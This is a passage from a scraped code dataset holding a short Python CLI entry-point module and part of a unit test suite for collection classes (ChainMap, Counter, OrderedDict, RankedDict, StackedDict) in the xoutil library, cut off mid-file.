"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A simple `main`:func: entry point for CLI based applications.\n\nThis module provides an example of how to use `xotl.tools.cli`:mod: to create a\nCLI application.\n\n\"\"\"\n\n\ndef main(default=None):\n \"\"\"Execute a command.\n\n It can be given as the first program argument or it's the `default`\n command is defined.\n\n \"\"\"\n import sys\n from xotl.tools.cli import Command, HELP_NAME\n\n args = sys.argv[1:]\n if args and not args[0].startswith(\"-\"):\n cmd_name = args[0]\n args = args[1:]\n else:\n cmd_name = default or Command.get_setting(\"default_command\", None) or HELP_NAME\n cmds = Command.registry\n cmd = cmds.get(cmd_name)\n if not cmd:\n print('Command \"%s\" not found!\\n' % cmd_name)\n cmd = cmds.get(HELP_NAME)\n args = []\n sys.exit(cmd().run(args))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.48057207465171814, "alphanum_fraction": 0.5087752342224121, "avg_line_length": 34.697288513183594, "blob_id": "8a298a1778f96a0dd941b3224023eb830f20235d", "content_id": "b0ff45c5d239a387607fe5f6b32968cf6c6e249f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47407, "license_type": "no_license", "max_line_length": 80, "num_lines": 1328, "path": "/tests/test_collections.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nimport unittest\n\nfrom random 
import shuffle\nfrom xoutil.future.collections import defaultdict\n\n\nclass TestCollections(unittest.TestCase):\n def test_defaultdict(self):\n d = defaultdict(lambda key, _: \"a\")\n self.assertEqual(\"a\", d[\"abc\"])\n d[\"abc\"] = 1\n self.assertEqual(1, d[\"abc\"])\n\n def test_defaultdict_clone(self):\n d = defaultdict(lambda key, d: d[\"a\"], {\"a\": \"default\"})\n self.assertEqual(\"default\", d[\"abc\"])\n\n d = defaultdict(lambda key, d: d[key])\n with self.assertRaises(KeyError):\n d[\"abc\"]\n\n\ndef test_stacked_dict_with_newpop():\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import StackedDict\n\n sd = StackedDict(a=\"level-0\", b=1)\n assert sd.pop(\"a\") == \"level-0\"\n assert sd.pop(\"non\", sd) is sd\n try:\n sd.pop(\"non\")\n except KeyError:\n pass\n else:\n assert False, \"Should have raised a KeyError\"\n\n\ndef test_stacked_dict():\n from xoutil.future.collections import StackedDict\n\n sd = StackedDict(a=\"level-0\")\n assert sd.peek() == dict(a=\"level-0\")\n sd.push_level(a=1, b=2, c=10)\n assert sd.level == 1\n assert sd.peek() == dict(a=1, b=2, c=10)\n sd.push_level(b=4, c=5)\n assert sd.peek() == dict(b=4, c=5)\n assert sd.level == 2\n assert sd[\"b\"] == 4\n assert sd[\"a\"] == 1\n assert sd[\"c\"] == 5\n assert len(sd) == 3\n del sd[\"c\"]\n try:\n del sd[\"c\"]\n assert False, \"Should have raise KeyError\"\n except KeyError:\n pass\n except:\n assert False, \"Should have raise KeyError\"\n assert sd.pop_level() == {\"b\": 4}\n assert sd[\"b\"] == 2\n assert sd[\"a\"] == 1\n assert len(sd) == 3\n sd.pop_level()\n assert sd[\"a\"] == \"level-0\"\n try:\n sd.pop_level()\n assert False, (\n \"Level 0 cannot be poped. \" \"It should have raised a TypeError\"\n )\n except TypeError:\n pass\n except:\n assert False, (\n \"Level 0 cannot be poped. 
\" \"It should have raised a TypeError\"\n )\n\n\n# Backported from Python 3.3.0 standard library\nfrom xoutil.future.collections import ChainMap, Counter\nfrom xoutil.future.collections import OrderedDict, RankedDict\nfrom xoutil.future.collections import Mapping, MutableMapping\nimport copy\nimport pickle\nfrom random import randrange\n\n\ndef _items(d):\n \"For some reason in new PyPy 5.0.1 for Py 2.7.10, set order is not nice.\"\n from xoutil.versions import python_version\n\n res = d.items()\n if python_version.pypy and isinstance(res, list):\n res.sort()\n return res\n\n\nclass TestChainMap(unittest.TestCase):\n def test_basics(self):\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 2\n d = c.new_child()\n d[\"b\"] = 20\n d[\"c\"] = 30\n # check internal state\n self.assertEqual(d.maps, [{\"b\": 20, \"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check items/iter/getitem\n self.assertEqual(_items(d), _items(dict(a=1, b=20, c=30)))\n # check len\n self.assertEqual(len(d), 3)\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, b=20, c=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n\n # unmask a value\n del d[\"b\"]\n # check internal state\n self.assertEqual(d.maps, [{\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check items/iter/getitem\n self.assertEqual(_items(d), _items(dict(a=1, b=2, c=30)))\n # check len\n self.assertEqual(len(d), 3)\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, b=2, c=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n # check repr\n self.assertIn(\n repr(d),\n [\n type(d).__name__ + \"({'c': 30}, {'a': 1, 'b': 2})\",\n type(d).__name__ + \"({'c': 30}, {'b': 2, 'a': 1})\",\n ],\n )\n\n # check shallow copies\n for e in d.copy(), copy.copy(d):\n self.assertEqual(d, e)\n self.assertEqual(d.maps, e.maps)\n self.assertIsNot(d, e)\n self.assertIsNot(d.maps[0], e.maps[0])\n for m1, m2 in zip(d.maps[1:], e.maps[1:]):\n self.assertIs(m1, 
m2)\n\n # check deep copies\n for e in [\n pickle.loads(pickle.dumps(d)),\n copy.deepcopy(d),\n eval(repr(d)),\n ]:\n self.assertEqual(d, e)\n self.assertEqual(d.maps, e.maps)\n self.assertIsNot(d, e)\n for m1, m2 in zip(d.maps, e.maps):\n self.assertIsNot(m1, m2, e)\n\n f = d.new_child()\n f[\"b\"] = 5\n self.assertEqual(f.maps, [{\"b\": 5}, {\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check parents\n self.assertEqual(f.parents.maps, [{\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # find first in chain\n self.assertEqual(f[\"b\"], 5)\n # look beyond maps[0]\n self.assertEqual(f.parents[\"b\"], 2)\n\n def test_contructor(self):\n # no-args --> one new dict\n self.assertEqual(ChainMap().maps, [{}])\n # 1 arg --> list\n self.assertEqual(ChainMap({1: 2}).maps, [{1: 2}])\n\n def test_bool(self):\n self.assertFalse(ChainMap())\n self.assertFalse(ChainMap({}, {}))\n self.assertTrue(ChainMap({1: 2}, {}))\n self.assertTrue(ChainMap({}, {1: 2}))\n\n def test_missing(self):\n class DefaultChainMap(ChainMap):\n def __missing__(self, key):\n return 999\n\n d = DefaultChainMap(dict(a=1, b=2), dict(b=20, c=30))\n for k, v in dict(a=1, b=2, c=30, d=999).items():\n # check __getitem__ w/missing\n self.assertEqual(d[k], v)\n for k, v in dict(a=1, b=2, c=30, d=77).items():\n # check get() w/ missing\n self.assertEqual(d.get(k, 77), v)\n for k, v in dict(a=True, b=True, c=True, d=False).items():\n # check __contains__ w/missing\n self.assertEqual(k in d, v)\n self.assertEqual(d.pop(\"a\", 1001), 1, d)\n # check pop() w/missing\n self.assertEqual(d.pop(\"a\", 1002), 1002)\n # check popitem() w/missing\n self.assertEqual(d.popitem(), (\"b\", 2))\n with self.assertRaises(KeyError):\n d.popitem()\n\n def test_dict_coercion(self):\n d = ChainMap(dict(a=1, b=2), dict(b=20, c=30))\n self.assertEqual(dict(d), dict(a=1, b=2, c=30))\n self.assertEqual(dict(d.items()), dict(a=1, b=2, c=30))\n\n def test_new_child(self):\n \"Tests for changes for issue #16613.\"\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 
2\n m = {\"b\": 20, \"c\": 30}\n d = c.new_child(m)\n # check internal state\n self.assertEqual(d.maps, [{\"b\": 20, \"c\": 30}, {\"a\": 1, \"b\": 2}])\n self.assertIs(m, d.maps[0])\n\n # Use a different map than a dict\n class lowerdict(dict):\n def __getitem__(self, key):\n if isinstance(key, str):\n key = key.lower()\n return dict.__getitem__(self, key)\n\n def __contains__(self, key):\n if isinstance(key, str):\n key = key.lower()\n return dict.__contains__(self, key)\n\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 2\n m = lowerdict(b=20, c=30)\n d = c.new_child(m)\n self.assertIs(m, d.maps[0])\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, B=20, C=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n\n\nclass TestCounter(unittest.TestCase):\n def test_basics(self):\n c = Counter(\"abcaba\")\n self.assertEqual(c, Counter({\"a\": 3, \"b\": 2, \"c\": 1}))\n self.assertEqual(c, Counter(a=3, b=2, c=1))\n self.assertIsInstance(c, dict)\n self.assertIsInstance(c, Mapping)\n self.assertTrue(issubclass(Counter, dict))\n self.assertTrue(issubclass(Counter, Mapping))\n self.assertEqual(len(c), 3)\n self.assertEqual(sum(c.values()), 6)\n self.assertEqual(sorted(c.values()), [1, 2, 3])\n self.assertEqual(sorted(c.keys()), [\"a\", \"b\", \"c\"])\n self.assertEqual(sorted(c), [\"a\", \"b\", \"c\"])\n self.assertEqual(sorted(c.items()), [(\"a\", 3), (\"b\", 2), (\"c\", 1)])\n self.assertEqual(c[\"b\"], 2)\n self.assertEqual(c[\"z\"], 0)\n self.assertEqual(c.__contains__(\"c\"), True)\n self.assertEqual(c.__contains__(\"z\"), False)\n self.assertEqual(c.get(\"b\", 10), 2)\n self.assertEqual(c.get(\"z\", 10), 10)\n self.assertEqual(c, dict(a=3, b=2, c=1))\n self.assertEqual(repr(c), \"Counter({'a': 3, 'b': 2, 'c': 1})\")\n self.assertEqual(c.most_common(), [(\"a\", 3), (\"b\", 2), (\"c\", 1)])\n for i in range(5):\n self.assertEqual(\n c.most_common(i), [(\"a\", 3), (\"b\", 2), (\"c\", 1)][:i]\n )\n 
self.assertEqual(\"\".join(sorted(c.elements())), \"aaabbc\")\n c[\"a\"] += 1 # increment an existing value\n c[\"b\"] -= 2 # sub existing value to zero\n del c[\"c\"] # remove an entry\n del c[\"c\"] # make sure that del doesn't raise KeyError\n c[\"d\"] -= 2 # sub from a missing value\n c[\"e\"] = -5 # directly assign a missing value\n c[\"f\"] += 4 # add to a missing value\n self.assertEqual(c, dict(a=4, b=0, d=-2, e=-5, f=4))\n self.assertEqual(\"\".join(sorted(c.elements())), \"aaaaffff\")\n self.assertEqual(c.pop(\"f\"), 4)\n self.assertNotIn(\"f\", c)\n for i in range(3):\n elem, cnt = c.popitem()\n self.assertNotIn(elem, c)\n c.clear()\n self.assertEqual(c, {})\n self.assertEqual(repr(c), \"Counter()\")\n self.assertRaises(NotImplementedError, Counter.fromkeys, \"abc\")\n self.assertRaises(TypeError, hash, c)\n c.update(dict(a=5, b=3))\n c.update(c=1)\n c.update(Counter(\"a\" * 50 + \"b\" * 30))\n c.update() # test case with no args\n c.__init__(\"a\" * 500 + \"b\" * 300)\n c.__init__(\"cdc\")\n c.__init__()\n self.assertEqual(c, dict(a=555, b=333, c=3, d=1))\n self.assertEqual(c.setdefault(\"d\", 5), 1)\n self.assertEqual(c[\"d\"], 1)\n self.assertEqual(c.setdefault(\"e\", 5), 5)\n self.assertEqual(c[\"e\"], 5)\n\n def test_copying(self):\n # Check that counters are copyable, deepcopyable, picklable, and\n # have a repr/eval round-trip\n words = Counter(\"which witch had which witches wrist watch\".split())\n update_test = Counter()\n update_test.update(words)\n for i, dup in enumerate(\n [\n words.copy(),\n copy.copy(words),\n copy.deepcopy(words),\n pickle.loads(pickle.dumps(words, 0)),\n pickle.loads(pickle.dumps(words, 1)),\n pickle.loads(pickle.dumps(words, 2)),\n pickle.loads(pickle.dumps(words, -1)),\n eval(repr(words)),\n update_test,\n Counter(words),\n ]\n ):\n # TODO: Not used ``msg = (i, dup, words)``\n self.assertTrue(dup is not words)\n self.assertEqual(dup, words)\n self.assertEqual(len(dup), len(words))\n self.assertEqual(type(dup), 
type(words))\n\n def test_copy_subclass(self):\n class MyCounter(Counter):\n pass\n\n c = MyCounter(\"slartibartfast\")\n d = c.copy()\n self.assertEqual(d, c)\n self.assertEqual(len(d), len(c))\n self.assertEqual(type(d), type(c))\n\n def test_conversions(self):\n # Convert to: set, list, dict\n s = \"she sells sea shells by the sea shore\"\n self.assertEqual(sorted(Counter(s).elements()), sorted(s))\n self.assertEqual(sorted(Counter(s)), sorted(set(s)))\n self.assertEqual(dict(Counter(s)), dict(Counter(s).items()))\n self.assertEqual(set(Counter(s)), set(s))\n\n def test_invariant_for_the_in_operator(self):\n c = Counter(a=10, b=-2, c=0)\n for elem in c:\n self.assertTrue(elem in c)\n self.assertIn(elem, c)\n\n def test_multiset_operations(self):\n # Verify that adding a zero counter will strip zeros and negatives\n c = Counter(a=10, b=-2, c=0) + Counter()\n self.assertEqual(dict(c), dict(a=10))\n\n elements = \"abcd\"\n for i in range(1000):\n # test random pairs of multisets\n p = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n p.update(e=1, f=-1, g=0)\n q = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n q.update(h=1, i=-1, j=0)\n for counterop, numberop in [\n (Counter.__add__, lambda x, y: max(0, x + y)),\n (Counter.__sub__, lambda x, y: max(0, x - y)),\n (Counter.__or__, lambda x, y: max(0, x, y)),\n (Counter.__and__, lambda x, y: max(0, min(x, y))),\n ]:\n result = counterop(p, q)\n for x in elements:\n self.assertEqual(\n numberop(p[x], q[x]), result[x], (counterop, x, p, q)\n )\n # verify that results exclude non-positive counts\n self.assertTrue(x > 0 for x in result.values())\n\n elements = \"abcdef\"\n for i in range(100):\n # verify that random multisets with no repeats are exactly like\n # sets\n p = Counter(dict((elem, randrange(0, 2)) for elem in elements))\n q = Counter(dict((elem, randrange(0, 2)) for elem in elements))\n for counterop, setop in [\n (Counter.__sub__, set.__sub__),\n (Counter.__or__, set.__or__),\n 
(Counter.__and__, set.__and__),\n ]:\n counter_result = counterop(p, q)\n set_result = setop(set(p.elements()), set(q.elements()))\n self.assertEqual(counter_result, dict.fromkeys(set_result, 1))\n\n def test_inplace_operations(self):\n elements = \"abcd\"\n for i in range(1000):\n # test random pairs of multisets\n p = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n p.update(e=1, f=-1, g=0)\n q = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n q.update(h=1, i=-1, j=0)\n for inplace_op, regular_op in [\n (Counter.__iadd__, Counter.__add__),\n (Counter.__isub__, Counter.__sub__),\n (Counter.__ior__, Counter.__or__),\n (Counter.__iand__, Counter.__and__),\n ]:\n c = p.copy()\n c_id = id(c)\n regular_result = regular_op(c, q)\n inplace_result = inplace_op(c, q)\n self.assertEqual(inplace_result, regular_result)\n self.assertEqual(id(inplace_result), c_id)\n\n def test_subtract(self):\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n c.subtract(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50)\n self.assertEqual(\n c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50)\n )\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n c.subtract(Counter(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50))\n self.assertEqual(\n c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50)\n )\n c = Counter(\"aaabbcd\")\n c.subtract(\"aaaabbcce\")\n self.assertEqual(c, Counter(a=-1, b=0, c=-1, d=1, e=-1))\n\n def test_unary(self):\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n self.assertEqual(dict(+c), dict(c=5, d=10, e=15, g=40))\n self.assertEqual(dict(-c), dict(a=5))\n\n def test_repr_nonsortable(self):\n c = Counter(a=2, b=None)\n r = repr(c)\n self.assertIn(\"'a': 2\", r)\n self.assertIn(\"'b': None\", r)\n\n def test_helper_function(self):\n from xoutil.future.collections import _count_elements\n\n # two paths, one for real dicts and one for other mappings\n elems = list(\"abracadabra\")\n\n d = dict()\n _count_elements(d, elems)\n self.assertEqual(d, {\"a\": 5, 
\"r\": 2, \"b\": 2, \"c\": 1, \"d\": 1})\n\n m = OrderedDict()\n _count_elements(m, elems)\n self.assertEqual(\n m, OrderedDict([(\"a\", 5), (\"b\", 2), (\"r\", 2), (\"c\", 1), (\"d\", 1)])\n )\n\n\nclass TestOrderedDict(unittest.TestCase):\n def test_init(self):\n with self.assertRaises(TypeError):\n # too many args\n OrderedDict([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n # dict input\n self.assertEqual(sorted(OrderedDict(dict(pairs)).items()), pairs)\n # kwds input\n self.assertEqual(sorted(OrderedDict(**dict(pairs)).items()), pairs)\n # pairs input\n self.assertEqual(list(OrderedDict(pairs).items()), pairs)\n # mixed input\n self.assertEqual(\n list(\n OrderedDict(\n [(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5\n ).items()\n ),\n pairs,\n )\n\n # Make sure that direct calls to __init__ do not clear previous\n # contents\n d = OrderedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.__init__([(\"e\", 5), (\"f\", 6)], g=7, d=4)\n self.assertEqual(\n list(d.items()),\n [\n (\"a\", 1),\n (\"b\", 2),\n (\"c\", 3),\n (\"d\", 4),\n (\"e\", 5),\n (\"f\", 6),\n (\"g\", 7),\n ],\n )\n\n def test_update(self):\n with self.assertRaises(TypeError):\n # too many args\n OrderedDict().update([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n od = OrderedDict()\n od.update(dict(pairs))\n # dict input\n self.assertEqual(sorted(od.items()), pairs)\n od = OrderedDict()\n od.update(**dict(pairs))\n # kwds input\n self.assertEqual(sorted(od.items()), pairs)\n od = OrderedDict()\n od.update(pairs)\n # pairs input\n self.assertEqual(list(od.items()), pairs)\n od = OrderedDict()\n od.update([(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5)\n # mixed input\n self.assertEqual(list(od.items()), pairs)\n\n # Issue 9137: Named argument called 'other' or 'self'\n # shouldn't be treated specially.\n od = OrderedDict()\n 
od.update(self=23)\n self.assertEqual(list(od.items()), [(\"self\", 23)])\n od = OrderedDict()\n od.update(other={})\n self.assertEqual(list(od.items()), [(\"other\", {})])\n od = OrderedDict()\n od.update(red=5, blue=6, other=7, self=8)\n self.assertEqual(\n sorted(list(od.items())),\n [(\"blue\", 6), (\"other\", 7), (\"red\", 5), (\"self\", 8)],\n )\n\n # Make sure that direct calls to update do not clear previous contents\n # add that updates items are not moved to the end\n d = OrderedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.update([(\"e\", 5), (\"f\", 6)], g=7, d=4)\n self.assertEqual(\n list(d.items()),\n [\n (\"a\", 1),\n (\"b\", 2),\n (\"c\", 3),\n (\"d\", 4),\n (\"e\", 5),\n (\"f\", 6),\n (\"g\", 7),\n ],\n )\n\n def test_abc(self):\n self.assertIsInstance(OrderedDict(), MutableMapping)\n self.assertTrue(issubclass(OrderedDict, MutableMapping))\n\n def test_clear(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n self.assertEqual(len(od), len(pairs))\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_delitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n del od[\"a\"]\n self.assertNotIn(\"a\", od)\n with self.assertRaises(KeyError):\n del od[\"a\"]\n self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])\n\n def test_setitem(self):\n od = OrderedDict([(\"d\", 1), (\"b\", 2), (\"c\", 3), (\"a\", 4), (\"e\", 5)])\n od[\"c\"] = 10 # existing element\n od[\"f\"] = 20 # new element\n self.assertEqual(\n list(od.items()),\n [(\"d\", 1), (\"b\", 2), (\"c\", 10), (\"a\", 4), (\"e\", 5), (\"f\", 20)],\n )\n\n def test_iterators(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n self.assertEqual(list(od), [t[0] for t in pairs])\n self.assertEqual(list(od.keys()), [t[0] for t in pairs])\n 
self.assertEqual(list(od.values()), [t[1] for t in pairs])\n self.assertEqual(list(od.items()), pairs)\n self.assertEqual(list(reversed(od)), [t[0] for t in reversed(pairs)])\n\n def test_popitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n while pairs:\n self.assertEqual(od.popitem(), pairs.pop())\n with self.assertRaises(KeyError):\n od.popitem()\n self.assertEqual(len(od), 0)\n\n def test_pop(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n shuffle(pairs)\n while pairs:\n k, v = pairs.pop()\n self.assertEqual(od.pop(k), v)\n with self.assertRaises(KeyError):\n od.pop(\"xyz\")\n self.assertEqual(len(od), 0)\n self.assertEqual(od.pop(k, 12345), 12345)\n\n # make sure pop still works when __missing__ is defined\n class Missing(OrderedDict):\n def __missing__(self, key):\n return 0\n\n m = Missing(a=1)\n self.assertEqual(m.pop(\"b\", 5), 5)\n self.assertEqual(m.pop(\"a\", 6), 1)\n self.assertEqual(m.pop(\"a\", 6), 6)\n with self.assertRaises(KeyError):\n m.pop(\"a\")\n\n def test_equality(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od1 = OrderedDict(pairs)\n od2 = OrderedDict(pairs)\n # same order implies equality\n self.assertEqual(od1, od2)\n pairs = pairs[2:] + pairs[:2]\n od2 = OrderedDict(pairs)\n # different order implies inequality\n self.assertNotEqual(od1, od2)\n # comparison to regular dict is not order sensitive\n self.assertEqual(od1, dict(od2))\n self.assertEqual(dict(od2), od1)\n # different length implied inequality\n self.assertNotEqual(od1, OrderedDict(pairs[:-1]))\n\n def test_copying(self):\n # Check that ordered dicts are copyable, deepcopyable, picklable,\n # and have a repr/eval round-trip\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n 
update_test = OrderedDict()\n update_test.update(od)\n for i, dup in enumerate(\n [\n od.copy(),\n copy.copy(od),\n copy.deepcopy(od),\n pickle.loads(pickle.dumps(od, 0)),\n pickle.loads(pickle.dumps(od, 1)),\n pickle.loads(pickle.dumps(od, 2)),\n pickle.loads(pickle.dumps(od, -1)),\n eval(repr(od)),\n update_test,\n OrderedDict(od),\n ]\n ):\n self.assertTrue(dup is not od)\n self.assertEqual(dup, od)\n self.assertEqual(list(dup.items()), list(od.items()))\n self.assertEqual(len(dup), len(od))\n self.assertEqual(type(dup), type(od))\n\n def test_yaml_linkage(self):\n # Verify that __reduce__ is setup in a way that supports PyYAML's\n # dump() feature.\n # In yaml, lists are native but tuples are not.\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n # yaml.dump(od) -->\n # '!!python/object/apply:__main__.OrderedDict\\n- - [a, 1]\\n - [b, 2]\\n'\n self.assertTrue(\n all(type(pair) == list for pair in od.__reduce__()[1])\n )\n\n def test_reduce_not_too_fat(self):\n import sys\n\n # do not save instance dictionary if not needed\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n self.assertIsNone(od.__reduce__()[2])\n od.x = 10\n self.assertIsNotNone(od.__reduce__()[2])\n\n def test_repr(self):\n od = OrderedDict([(\"c\", 1), (\"b\", 2), (\"a\", 3)])\n self.assertEqual(\n repr(od), \"OrderedDict([('c', 1), ('b', 2), ('a', 3)])\"\n )\n self.assertEqual(eval(repr(od)), od)\n self.assertEqual(repr(OrderedDict()), \"OrderedDict()\")\n\n def test_repr_recursive(self):\n # See issue #9826\n od = OrderedDict.fromkeys(\"abc\")\n od[\"x\"] = od\n self.assertEqual(\n repr(od),\n (\n \"OrderedDict([('a', None), ('b', None), \"\n \"('c', None), ('x', ...)])\"\n ),\n )\n\n def test_setdefault(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n pair_order = list(od.items())\n 
self.assertEqual(od.setdefault(\"a\", 10), 3)\n # make sure order didn't change\n self.assertEqual(list(od.items()), pair_order)\n self.assertEqual(od.setdefault(\"x\", 10), 10)\n # make sure 'x' is added to the end\n self.assertEqual(list(od.items())[-1], (\"x\", 10))\n\n # make sure setdefault still works when __missing__ is defined\n class Missing(OrderedDict):\n def __missing__(self, key):\n return 0\n\n self.assertEqual(Missing().setdefault(5, 9), 9)\n\n def test_reinsert(self):\n # Given insert a, insert b, delete a, re-insert a,\n # verify that a is now later than b.\n od = OrderedDict()\n od[\"a\"] = 1\n od[\"b\"] = 2\n del od[\"a\"]\n od[\"a\"] = 1\n self.assertEqual(list(od.items()), [(\"b\", 2), (\"a\", 1)])\n\n def test_move_to_end(self):\n od = OrderedDict.fromkeys(\"abcde\")\n self.assertEqual(list(od), list(\"abcde\"))\n od.move_to_end(\"c\")\n self.assertEqual(list(od), list(\"abdec\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"e\")\n self.assertEqual(list(od), list(\"cabde\"))\n with self.assertRaises(KeyError):\n od.move_to_end(\"x\")\n\n @unittest.skipIf(\"PyPy\" in sys.version, \"sys.getsizeof not supported\")\n def test_sizeof(self):\n # Wimpy test: Just verify the reported size is larger than a regular\n # dict\n d = dict(a=1)\n od = OrderedDict(**d)\n self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))\n\n def test_override_update(self):\n # Verify that subclasses can override update() without breaking\n # __init__()\n class MyOD(OrderedDict):\n def update(self, *args, **kwds):\n raise Exception()\n\n items = [(\"a\", 1), (\"c\", 3), (\"b\", 2)]\n self.assertEqual(list(MyOD(items).items()), items)\n\n\nclass TestRankedDict(unittest.TestCase):\n def test_init(self):\n with self.assertRaises(TypeError):\n # too many args\n RankedDict([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 
4), (\"e\", 5)]\n # dict input\n self.assertEqual(sorted(RankedDict(dict(pairs)).items()), pairs)\n # kwds input\n self.assertEqual(sorted(RankedDict(**dict(pairs)).items()), pairs)\n # pairs input\n self.assertEqual(list(RankedDict(pairs).items()), pairs)\n # mixed input\n self.assertNotEqual(\n list(\n RankedDict(\n [(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5\n ).items()\n ),\n pairs,\n )\n\n # Make sure that direct calls to __init__ do not clear previous\n # contents\n d = RankedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.__init__([(\"f\", 6), (\"e\", 5)], d=4)\n self.assertEqual(\n list(d.items()),\n [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"f\", 6), (\"e\", 5), (\"d\", 4)],\n )\n\n def test_update(self):\n with self.assertRaises(TypeError):\n # too many args\n RankedDict().update([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n od = RankedDict()\n od.update(dict(pairs))\n # dict input\n self.assertEqual(sorted(od.items()), pairs)\n od = RankedDict()\n od.update(**dict(pairs))\n # kwds input\n self.assertEqual(sorted(od.items()), pairs)\n od = RankedDict()\n od.update(pairs)\n # pairs input\n self.assertEqual(list(od.items()), pairs)\n od = RankedDict()\n od.update([(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5)\n # mixed input\n self.assertNotEqual(list(od.items()), pairs)\n\n # Issue 9137: Named argument called 'other' or 'self'\n # shouldn't be treated specially.\n od = RankedDict()\n od.update(self=23)\n self.assertEqual(list(od.items()), [(\"self\", 23)])\n od = RankedDict()\n od.update(other={})\n self.assertEqual(list(od.items()), [(\"other\", {})])\n od = RankedDict()\n od.update(red=5, blue=6, other=7, self=8)\n self.assertEqual(\n sorted(list(od.items())),\n [(\"blue\", 6), (\"other\", 7), (\"red\", 5), (\"self\", 8)],\n )\n\n def test_abc(self):\n self.assertIsInstance(RankedDict(), MutableMapping)\n self.assertTrue(issubclass(RankedDict, 
